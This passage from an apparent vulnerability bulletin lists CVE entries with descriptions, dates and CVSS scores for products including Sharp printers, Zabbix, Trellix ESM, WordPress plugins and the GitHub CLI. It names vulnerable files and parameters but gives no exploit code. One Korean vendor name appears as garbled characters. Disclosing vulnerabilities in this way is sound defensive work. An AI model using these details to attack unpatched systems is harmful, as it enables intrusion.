| Sensei--Sensei Mac Cleaner |
The application Sensei Mac Cleaner contains a local privilege escalation vulnerability, allowing an attacker to perform multiple operations as the root user. These operations include arbitrary file deletion and writing, loading and unloading daemons, manipulating file permissions, and loading extensions, among other actions. The vulnerable module org.cindori.SenseiHelper can be contacted via XPC. While the module performs client validation, it relies on the client's PID obtained through the public processIdentifier property of the NSXPCConnection class. This approach makes the module susceptible to a PID Reuse Attack, enabling an attacker to impersonate a legitimate client and send crafted XPC messages to invoke arbitrary methods exposed by the HelperProtocol interface. | 2024-11-25 | 7.8 | CVE-2024-7915 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
The web interface of the affected devices processes a cookie value improperly, leading to a stack buffer overflow. More precisely, giving too long character string to MFPSESSIONID parameter results in a stack buffer overflow. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 9 | CVE-2024-28038 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
"sessionlist.html" and "sys_trayentryreboot.html" are accessible with no authentication. "sessionlist.html" provides logged-in users' session information including session cookies, and "sys_trayentryreboot.html" allows to reboot the device. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 9.1 | CVE-2024-33610 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
There are several hidden accounts. Some of them are intended for maintenance engineers, and with the knowledge of their passwords (e.g., by examining the coredump), these accounts can be used to re-configure the device. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 9.1 | CVE-2024-35244 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
API keys for some cloud services are hardcoded in the "main" binary. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 9.1 | CVE-2024-36248 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
Improper processing of some parameters of installed_emanual_list.html leads to a path traversal vulnerability. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 7.5 | CVE-2024-33605 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
Cross-site scripting vulnerability exists in Sharp Corporation and Toshiba Tech Corporation multiple MFPs (multifunction printers). If this vulnerability is exploited, an arbitrary script may be executed on the administrative page of the affected MFPs. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 7.4 | CVE-2024-36249 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
The web interface of the affected devices process some crafted HTTP requests improperly, leading to a device crash. More precisely, a crafted parameter to billcodedef_sub_sel.html is not processed properly and device-crash happens. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 7.5 | CVE-2024-36251 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
Out-of-bounds read vulnerability exists in Sharp Corporation and Toshiba Tec Corporation multiple MFPs (multifunction printers), which may lead to a denial-of-service (DoS) condition. | 2024-11-26 | 7.5 | CVE-2024-36254 |
| Softpulse Infotech--SP Blog Designer |
Path Traversal: '.../...//' vulnerability in Softpulse Infotech SP Blog Designer allows PHP Local File Inclusion.This issue affects SP Blog Designer: from n/a through 1.0.0. | 2024-11-28 | 7.5 | CVE-2024-52498 |
| Spencer14420--SPEmailHandler-PHP |
sp-php-email-handler is a PHP package for handling contact form submissions. Messages sent using this script are vulnerable to abuse, as the script allows anybody to specify arbitrary email recipients and include user-provided content in confirmation emails. This could enable malicious actors to use your server to send spam, phishing emails, or other malicious content, potentially damaging your domain's reputation and leading to blacklisting by email providers. Patched in version 1.0.0 by removing user-provided content from confirmation emails. All pre-release versions (alpha and beta) are vulnerable to this issue and should not be used. There are no workarounds for this issue. Users must upgrade to version 1.0.0 to mitigate the vulnerability. | 2024-11-27 | 8.6 | CVE-2024-53860 |
| SUSE--openSUSE Factory |
Various problems in obs-scm-bridge allows attackers that create specially crafted git repositories to leak information of cause denial of service. | 2024-11-28 | 7.3 | CVE-2024-22038 |
| Tenda--AC8 |
A vulnerability was found in Tenda AC8 16.03.34.09 and classified as critical. Affected by this issue is the function route_static_check of the file /goform/SetStaticRouteCfg. The manipulation of the argument list leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-26 | 8.8 | CVE-2024-11745 |
| Trellix--Trellix Enterprise Security Manager (ESM) |
A vulnerability in ESM 11.6.10 allows unauthenticated access to the internal Snowservice API and enables remote code execution through command injection, executed as the root user. | 2024-11-29 | 9.8 | CVE-2024-11482 |
| Trellix--Trellix Enterprise Security Manager (ESM) |
A vulnerability in ESM 11.6.10 allows unauthenticated access to the internal Snowservice API. This leads to improper handling of path traversal, insecure forwarding to an AJP backend without adequate validation, and lack of authentication for accessing internal API endpoints. | 2024-11-29 | 8.2 | CVE-2024-11481 |
| tumultinc--Tumult Hype Animations |
The Tumult Hype Animations plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the hypeanimations_panel() function in all versions up to, and including, 1.9.15. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2024-11-28 | 9.9 | CVE-2024-11082 |
| Tyche Softwares--Booking & Appointment Plugin for WooCommerce |
The Booking & Appointment Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_google_calendar_data' function in versions up to, and including, 6.9.0. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily. | 2024-11-26 | 8.8 | CVE-2024-10729 |
| Universal Audio--UAConnect |
The com.uaudio.bsd.helper service, responsible for handling privileged operations, fails to implement critical client validation during XPC inter-process communication (IPC). Specifically, the service does not verify the code requirements, entitlements, or security flags of any client attempting to establish a connection. This lack of proper validation allows unauthorized clients to exploit the service's methods and escalate privileges to root. | 2024-11-25 | 7.8 | CVE-2024-8272 |
| Valor Apps--Easy Folder Listing Pro |
Valor Apps Easy Folder Listing Pro has a deserialization vulnerability that allows an unauthenticated, remote attacker to execute arbitrary code with the privileges of the Joomla! application. Fixed in versions 3.8 and 4.5. | 2024-11-26 | 9.8 | CVE-2024-11145 |
| VMware--VMware Aria Operations |
VMware Aria Operations contains a local privilege escalation vulnerability. A malicious actor with local administrative privileges may trigger this vulnerability to escalate privileges to root user on the appliance running VMware Aria Operations. | 2024-11-26 | 7.8 | CVE-2024-38830 |
| VMware--VMware Aria Operations |
VMware Aria Operations contains a local privilege escalation vulnerability. A malicious actor with local administrative privileges can insert malicious commands into the properties file to escalate privileges to a root user on the appliance running VMware Aria Operations. | 2024-11-26 | 7.8 | CVE-2024-38831 |
| VMware--VMware Aria Operations |
VMware Aria Operations contains a stored cross-site scripting vulnerability. A malicious actor with editing access to views may be able to inject malicious script leading to stored cross-site scripting in the product VMware Aria Operations. | 2024-11-26 | 7.1 | CVE-2024-38832 |
| webbytemplate--Office Locator |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in webbytemplate Office Locator.This issue affects Office Locator: from n/a through 1.3.0. | 2024-11-28 | 7.5 | CVE-2024-52501 |
| WP WOX--Footer Flyout Widget |
Cross-Site Request Forgery (CSRF) vulnerability in WP WOX Footer Flyout Widget allows Stored XSS.This issue affects Footer Flyout Widget: from n/a through 1.1. | 2024-11-28 | 7.1 | CVE-2024-53732 |
| WP-speedup--Block Editor Bootstrap Blocks |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP-speedup Block Editor Bootstrap Blocks allows Reflected XSS.This issue affects Block Editor Bootstrap Blocks: from n/a through 6.6.1. | 2024-11-28 | 7.1 | CVE-2024-11402 |
| wpdevart--Booking calendar, Appointment Booking System |
The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.2.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2024-11-26 | 7.2 | CVE-2024-9504 |
| Zabbix--Zabbix |
A non-admin user account on the Zabbix frontend with the default User role, or with any other role that gives API access can exploit this vulnerability. An SQLi exists in the CUser class in the addRelatedObjects function, this function is being called from the CUser.get function which is available for every user who has API access. | 2024-11-27 | 9.9 | CVE-2024-42327 |
| Zabbix--Zabbix |
The HttpRequest object allows to get the HTTP headers from the server's response after sending the request. The problem is that the returned strings are created directly from the data returned by the server and are not correctly encoded for JavaScript. This allows to create internal strings that can be used to access hidden properties of objects. | 2024-11-27 | 9.1 | CVE-2024-42330 |
| Zabbix--Zabbix |
A bug in the code allows an attacker to sign a forged zbx_session cookie, which then allows them to sign in with admin permissions. | 2024-11-28 | 8.8 | CVE-2024-36466 |
| Zabbix--Zabbix |
An authenticated user with API access (e.g.: user with default User role), more specifically a user with access to the user.update API endpoint is enough to be able to add themselves to any group (e.g.: Zabbix Administrators), except to groups that are disabled or having restricted GUI access. | 2024-11-27 | 7.5 | CVE-2024-36467 |
| zhmcclient--python-zhmcclient |
zhmcclient is a pure Python client library for the IBM Z HMC Web Services API. In affected versions the Python package "zhmcclient" writes password-like properties in clear text into its HMC and API logs in the following cases: 1. The 'boot-ftp-password' and 'ssc-master-pw' properties when creating or updating a partition in DPM mode, in the zhmcclient API and HMC logs. 2. The 'ssc-master-pw' and 'zaware-master-pw' properties when updating an LPAR in classic mode, in the zhmcclient API and HMC logs. 3. The 'ssc-master-pw' and 'zaware-master-pw' properties when creating or updating an image activation profile in classic mode, in the zhmcclient API and HMC logs. 4. The 'password' property when creating or updating an HMC user, in the zhmcclient API log. 5. The 'bind-password' property when creating or updating an LDAP server definition, in the zhmcclient API and HMC logs. This issue affects only users of the zhmcclient package that have enabled the Python loggers named "zhmcclient.api" (for the API log) or "zhmcclient.hmc" (for the HMC log) and that use the functions listed above. This issue has been fixed in zhmcclient version 1.18.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-29 | 8.2 | CVE-2024-53865 |
| zhmcclient--zhmc-ansible-modules |
ibm.ibm_zhmc is an Ansible collection for the IBM Z HMC. The Ansible collection "ibm.ibm_zhmc" writes password-like properties in clear text into its log file and into the output returned by some of its Ansible module in the following cases: 1. The 'boot_ftp_password' and 'ssc_master_pw' properties are passed as input to the zhmc_partition Ansible module. 2. The 'ssc_master_pw' and 'zaware_master_pw' properties are passed as input to the zhmc_lpar Ansible module. 3. The 'password' property is passed as input to the zhmc_user Ansible module (just in log file, not in module output). 4. The 'bind_password' property is passed as input to the zhmc_ldap_server_definition Ansible module. These properties appear in the module output only when they were specified in the module input and when creating or updating the corresponding resources. They do not appear in the output when retrieving facts for the corresponding resources. These properties appear in the log file only when the "log_file" module input parameter is used. By default, no log file is created. This issue has been fixed in ibm.ibm_zhmc version 1.9.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-29 | 8.2 | CVE-2024-53979 |
| Zyxel--ATP series firmware |
A directory traversal vulnerability in the web management interface of Zyxel ATP series firmware versions V5.00 through V5.38, USG FLEX series firmware versions V5.00 through V5.38, USG FLEX 50(W) series firmware versions V5.10 through V5.38, and USG20(W)-VPN series firmware versions V5.10 through V5.38 could allow an attacker to download or upload files via a crafted URL. | 2024-11-27 | 7.5 | CVE-2024-11667 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1000 Projects--Bookstore Management System |
A vulnerability, which was classified as problematic, has been found in 1000 Projects Bookstore Management System 1.0. This issue affects some unknown processing. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-11-25 | 4.3 | CVE-2024-11673 |
| Advantech--EKI-6333AC-2G |
A CWE-798 "Use of Hard-coded Credentials" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The vulnerability is associated to the backup configuration functionality that by default encrypts the archives using a static password. | 2024-11-26 | 6.5 | CVE-2024-50377 |
| Aftab Husain--Vertical Carousel |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aftab Husain Vertical Carousel allows Stored XSS.This issue affects Vertical Carousel: from n/a through 1.0.2. | 2024-11-30 | 6.5 | CVE-2024-53756 |
| antonbond--Additional Order Filters for WooCommerce |
The Additional Order Filters for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shipping_method_filter' parameter in all versions up to, and including, 1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-26 | 6.1 | CVE-2024-11418 |
| Apache Software Foundation--Apache NimBLE |
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Apache NimBLE. Specially crafted MESH message could result in memory corruption when non-default build configuration is used. This issue affects Apache NimBLE: through 1.7.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue. | 2024-11-26 | 6.3 | CVE-2024-47248 |
| Apache Software Foundation--Apache NimBLE |
Improper Validation of Array Index vulnerability in Apache NimBLE. Lack of input validation for HCI events from controller could result in out-of-bound memory corruption and crash. This issue requires broken or bogus Bluetooth controller and thus severity is considered low. This issue affects Apache NimBLE: through 1.7.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue. | 2024-11-26 | 5 | CVE-2024-47249 |
| Apache Software Foundation--Apache NimBLE |
Out-of-bounds Read vulnerability in Apache NimBLE. Missing proper validation of HCI advertising report could lead to out-of-bound access when parsing HCI event and thus bogus GAP 'device found' events being sent. This issue requires broken or bogus Bluetooth controller and thus severity is considered low. This issue affects Apache NimBLE: through 1.7.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue. | 2024-11-26 | 5 | CVE-2024-47250 |
| Atlassian--Confluence Data Center |
This Medium severity Security Misconfiguration vulnerability was introduced in version 8.8.1 of Confluence Data Center and Server for Windows installations. This Security Misconfiguration vulnerability, with a CVSS Score of 6.4 allows an authenticated attacker of the Windows host to read sensitive information about the Confluence Data Center configuration which has high impact to confidentiality, high impact to integrity, high impact to availability, and no user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to the latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: Upgrade to a release greater than or equal to 7.19.18 * Confluence Data Center and Server 8.5: Upgrade to a release greater than or equal to 8.5.5 * Confluence Data Center and Server 8.7: Upgrade to a release greater than or equal to 8.7.2 * Confluence Data Center and Server 8.8: Upgrade to a release greater than or equal to 8.8.0 See the release notes (https://confluence.atlassian.com/conf88/confluence-release-notes-1354501008.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives ). This vulnerability was reported via our Atlassian Bug Bounty Program by Chris Elliot. | 2024-11-27 | 6.4 | CVE-2024-21703 |
| autolab--Autolab |
Autolab is a course management service that enables auto-graded programming assignments. A user can modify their first and or last name to include a valid excel / spreadsheet formula. When an instructor downloads their course's roster and opens, this name will then be evaluated as a formula. This could lead to leakage of information of students in the course roster by sending the data to a remote endpoint. This issue has been patched in the source code repository and the fix is expected to be released in the next version. Users are advised to manually patch their systems or to wait for the next release. There are no known workarounds for this vulnerability. | 2024-11-27 | 6.8 | CVE-2024-53260 |
| Axis Communications AB--AXIS Camera Station Pro |
Seth Fogie, member of the AXIS Camera Station Pro Bug Bounty Program, has found that the Incident report feature may expose sensitive credentials on the AXIS Camera Station windows client. If Incident report is not being used with credentials configured this flaw does not apply. Axis has released patched versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution. | 2024-11-26 | 6.3 | CVE-2024-6749 |
| Axis Communications AB--AXIS Camera Station Pro |
Gee-netics, member of the AXIS Camera Station Pro Bug Bounty Program has found that it is possible for a non-admin user to gain system privileges by redirecting a file deletion upon service restart. Axis has released patched versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution. | 2024-11-26 | 4.2 | CVE-2024-6476 |
| Axis Communications AB--AXIS Camera Station Pro |
Seth Fogie, member of AXIS Camera Station Pro Bug Bounty Program has found that it is possible to edit and/or remove views without the necessary permission due to a client-side-only check. Axis has released patched versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution. | 2024-11-26 | 4.4 | CVE-2024-6831 |
| Axis Communications AB--AXIS OS |
51l3nc3, member of the AXIS OS Bug Bounty Program, has found that the VAPIX API managedoverlayimages.cgi was vulnerable to a race condition attack allowing for an attacker to block access to the overlay configuration page in the web interface of the Axis device. This flaw can only be exploited after authenticating with an operator- or administrator-privileged service account. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution. | 2024-11-26 | 4.3 | CVE-2024-8772 |
| ays-pro--FAQ Builder AYS |
The FAQ Builder AYS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ays_faq_tab' parameter in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-28 | 6.1 | CVE-2024-11458 |
| backstage--backstage |
The Backstage Scaffolder plugin Houses types and utilities for building scaffolder-related modules. A vulnerability is identified in Backstage Scaffolder template functionality where Server-Side Template Injection (SSTI) can be exploited to perform Git config injection. The vulnerability allows an attacker to capture privileged git tokens used by the Backstage Scaffolder plugin. With these tokens, unauthorized access to sensitive resources in git can be achieved. The impact is considered medium severity as the Backstage Threat Model recommends restricting access to adding and editing templates in the Backstage Catalog plugin. The issue has been resolved in versions `v0.4.12`, `v0.5.1` and `v0.6.1` of the `@backstage/plugin-scaffolder-node` package. Users are encouraged to upgrade to this version to mitigate the vulnerability. Users are advised to upgrade. Users unable to upgrade may ensure that templates do not change git config. | 2024-11-29 | 5.4 | CVE-2024-53983 |
| Berg Informatik--Stripe Donation |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Berg Informatik Stripe Donation allows Stored XSS.This issue affects Stripe Donation: from n/a through 1.2.5. | 2024-12-01 | 6.5 | CVE-2024-53752 |
| BlackBerry--AtHoc |
A Stored Cross-Site Scripting (XSS) vulnerability in the Management Console of BlackBerry AtHoc version 7.15 could allow an attacker to potentially execute actions in the context of the victim's session. | 2024-11-25 | 4.6 | CVE-2024-51723 |
| bluenotes--BNE Gallery Extended |
The BNE Gallery Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gallery' shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-26 | 6.4 | CVE-2024-11119 |
| Capitalize My Title--Capitalize My Title |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Capitalize My Title allows Stored XSS.This issue affects Capitalize My Title: from n/a through 0.5.3. | 2024-11-30 | 6.5 | CVE-2024-53760 |
| cilium--cilium |
Cilium is a networking, observability, and security solution with an eBPF-based dataplane. For users with the following configuration: 1. An allow policy that selects a Layer 3 destination and a port range `AND` 2. A Layer 7 allow policy that selects a specific port within the first policy's range the Layer 7 enforcement would not occur for the traffic selected by the Layer 7 policy. This issue only affects users who use Cilium's port range functionality, which was introduced in Cilium v1.16. This issue is patched in PR #35150. This issue affects Cilium v1.16 between v1.16.0 and v1.16.3 inclusive. This issue is patched in Cilium v1.16.4. Users are advised to upgrade. Users with network policies that match the pattern described above can work around the issue by rewriting any policies that use port ranges to individually specify the ports permitted for traffic. | 2024-11-25 | 5.8 | CVE-2024-52529 |
| cimatti--WordPress Contact Forms by Cimatti |
The WordPress Contact Forms by Cimatti plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.2. This is due to missing or incorrect nonce validation on the process_bulk_action function. This makes it possible for unauthenticated attackers to delete forms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-11-27 | 4.3 | CVE-2024-10521 |
| cli--cli |
The gh cli is GitHub's official command line tool. A security vulnerability has been identified in the GitHub CLI that could leak authentication tokens when cloning repositories containing `git` submodules hosted outside of GitHub.com and ghe.com. This vulnerability stems from several `gh` commands used to clone a repository with submodules from a non-GitHub host including `gh repo clone`, `gh repo fork`, and `gh pr checkout`. These GitHub CLI commands invoke git with instructions to retrieve authentication tokens using the `credential.helper` configuration variable for any host encountered. Prior to version `2.63.0`, hosts other than GitHub.com and ghe.com are treated as GitHub Enterprise Server hosts and have tokens sourced from the following environment variables before falling back to host-specific tokens stored within system-specific secured storage: 1. `GITHUB_ENTERPRISE_TOKEN`, 2. `GH_ENTERPRISE_TOKEN` and 3. `GITHUB_TOKEN` when the `CODESPACES` environment variable is set. The result being `git` sending authentication tokens when cloning submodules. In version `2.63.0`, these GitHub CLI commands will limit the hosts for which `gh` acts as a credential helper to source authentication tokens. Additionally, `GITHUB_TOKEN` will only be used for GitHub.com and ghe.com. Users are advised to upgrade. Additionally users are advised to revoke authentication tokens used with the GitHub CLI and to review their personal security log and any relevant audit logs for actions associated with their account or enterprise | 2024-11-27 | 6.5 | CVE-2024-53858 |
| cli--go-gh |
go-gh is a Go module for interacting with the `gh` utility and the GitHub API from the command line. A security vulnerability has been identified in `go-gh` that could leak authentication tokens intended for GitHub hosts to non-GitHub hosts when within a codespace. `go-gh` sources authentication tokens from different environment variables depending on the host involved: 1. `GITHUB_TOKEN`, `GH_TOKEN` for GitHub.com and ghe.com and 2. `GITHUB_ENTERPRISE_TOKEN`, `GH_ENTERPRISE_TOKEN` for GitHub Enterprise Server. Prior to version `2.11.1`, `auth.TokenForHost` could source a token from the `GITHUB_TOKEN` environment variable for a host other than GitHub.com or ghe.com when within a codespace. In version `2.11.1`, `auth.TokenForHost` will only source a token from the `GITHUB_TOKEN` environment variable for GitHub.com or ghe.com hosts. Successful exploitation could send authentication token to an unintended host. This issue has been addressed in version 2.11.1 and all users are advised to upgrade. Users are also advised to regenerate authentication tokens and to review their personal security log and any relevant audit logs for actions associated with their account or enterprise. | 2024-11-27 | 6.5 | CVE-2024-53859 |
| code-projects--Farmacia |
A vulnerability was found in code-projects Farmacia up to 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file pagamento.php. The manipulation of the argument notaFiscal leads to sql injection. The attack can be launched remotely. | 2024-11-28 | 6.3 | CVE-2024-11968 |
| code-projects--Farmacia |
A vulnerability was found in code-projects Farmacia 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /visualizer-forneccedor.chp. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-11-30 | 6.3 | CVE-2024-11998 |
| code-projects--Farmacia |
A vulnerability, which was classified as critical, was found in code-projects Farmacia 1.0. This affects an unknown part of the file /visualizar-produto.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-01 | 6.3 | CVE-2024-12007 |
| code-projects--Responsive Hotel Site |
A vulnerability, which was classified as critical, has been found in code-projects Responsive Hotel Site 1.0. Affected by this issue is some unknown functionality of the file /admin/room.php. The manipulation of the argument troom leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-28 | 6.3 | CVE-2024-11963 |
| CodeAstro--Hospital Management System |
A vulnerability, which was classified as critical, was found in CodeAstro Hospital Management System 1.0. Affected is an unknown function of the file /backend/doc/his_doc_update-account.php. The manipulation of the argument doc_dpic leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-26 | 6.3 | CVE-2024-11674 |
| Codeless--Cowidgets Elementor Addons |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codeless Cowidgets - Elementor Addons allows Stored XSS.This issue affects Cowidgets - Elementor Addons: from n/a through 1.2.0. | 2024-11-30 | 6.5 | CVE-2024-53786 |
| Codezips--Free Exam Hall Seating Management System |
A vulnerability was found in Codezips Free Exam Hall Seating Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file profile.php of the component Profile Image Handler. The manipulation of the argument image leads to unrestricted upload. The attack can be initiated remotely. The researcher submit confuses the vulnerability class of this issue. | 2024-11-25 | 4.3 | CVE-2024-11661 |
| collizo4sky--Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content ProfilePress |
The ProfilePress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.15.18 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator. | 2024-11-27 | 5.3 | CVE-2024-11083 |
| Cosmosfarm-- By |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 코스모스팜 - Cosmosfarm 소셜 ê³µìœ ë²„íŠ¼ By 코스모스팜 allows Stored XSS.This issue affects 소셜 ê³µìœ ë²„íŠ¼ By 코스모스팜: from n/a through 1.9. | 2024-12-01 | 6.5 | CVE-2024-53745 |
| creativemindssolutions--CM WordPress Search And Replace Plugin |
Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-26 | 6.1 | CVE-2024-11202 |
| Dell--Wyse Management Suite |
Dell Wyse Management Suite, version WMS 4.4 and prior, contain a Missing Authorization vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Denial of service and arbitrary file deletion | 2024-11-26 | 5.9 | CVE-2024-49596 |
| denoland--deno |
Deno is a runtime for JavaScript and TypeScript written in rust. Several cross-site scripting vulnerabilities existed in the `deno_doc` crate which lead to Self-XSS with deno doc --html. 1.) XSS in generated `search_index.js`, `deno_doc` outputs a JavaScript file for searching. However, the generated file used `innerHTML` on unsanitzed HTML input. 2.) XSS via property, method and enum names, `deno_doc` did not sanitize property names, method names and enum names. The first XSS most likely didn't have an impact since `deno doc --html` is expected to be used locally with own packages. | 2024-11-25 | 5.4 | CVE-2024-32468 |
| Devnex--Devnex Addons For Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Devnex Devnex Addons For Elementor allows DOM-Based XSS.This issue affects Devnex Addons For Elementor: from n/a through 1.0.8. | 2024-11-30 | 6.5 | CVE-2024-53766 |
| Devolutions--Remote Desktop Manager |
Incorrect authorization in the permission validation component of Devolutions Remote Desktop Manager 2024.2.21 and earlier on Windows allows a malicious authenticated user to bypass the "View Password" permission via specific actions. | 2024-11-25 | 5.4 | CVE-2024-11670 |
| Devolutions--Remote Desktop Manager |
Improper authentication in SQL data source MFA validation in Devolutions Remote Desktop Manager 2024.3.17 and earlier on Windows allows an authenticated user to bypass the MFA validation via data source switching. | 2024-11-25 | 5.4 | CVE-2024-11671 |
| Devolutions--Remote Desktop Manager |
Incorrect authorization in the add permission component in Devolutions Remote Desktop Manager 2024.2.21 and earlier on Windows allows an authenticated malicious user to bypass the "Add" permission via the import in vault feature. | 2024-11-25 | 4.3 | CVE-2024-11672 |
| Eaton--Intelligent Power Manager (IPM) |
Eaton Intelligent Power Manager (IPM) prior to 1.70 is vulnerable to stored Cross site scripting. The vulnerability exists due to insufficient validation of input from certain resources by the IPM software. The attacker would need access to the local Subnet and an administrator interaction to compromise the system | 2024-11-25 | 5.2 | CVE-2021-23282 |
| Eaton--Intelligent Power Protector (IPP) |
IPP software prior to v1.71 is vulnerable to default credential vulnerability. This could lead attackers to identify and access vulnerable systems. | 2024-11-25 | 6.7 | CVE-2022-33862 |
| Eaton--Intelligent Power Protector |
IPP software versions prior to v1.71 do not sufficiently verify the authenticity of data, in a way that causes it to accept invalid data. | 2024-11-25 | 5.1 | CVE-2022-33861 |
| elemntor--Elementor Website Builder More than Just a Page Builder |
The Elementor Website Builder - More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' parameter of the Icon widget in all versions up to, and including, 3.25.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-26 | 6.4 | CVE-2024-8236 |
| EnGenius--ENH1350EXT |
A vulnerability was found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118. It has been classified as critical. Affected is an unknown function of the file /admin/network/wifi_schedule. The manipulation of the argument wifi_schedule_day_em_5 leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-25 | 4.7 | CVE-2024-11651 |
| EnGenius--ENH1350EXT |
A vulnerability was found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/sn_package/sn_https. The manipulation of the argument https_enable leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-25 | 4.7 | CVE-2024-11652 |
| EnGenius--ENH1350EXT |
A vulnerability was found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/network/diag_traceroute. The manipulation of the argument diag_traceroute leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-25 | 4.7 | CVE-2024-11653 |
| EnGenius--ENH1350EXT |
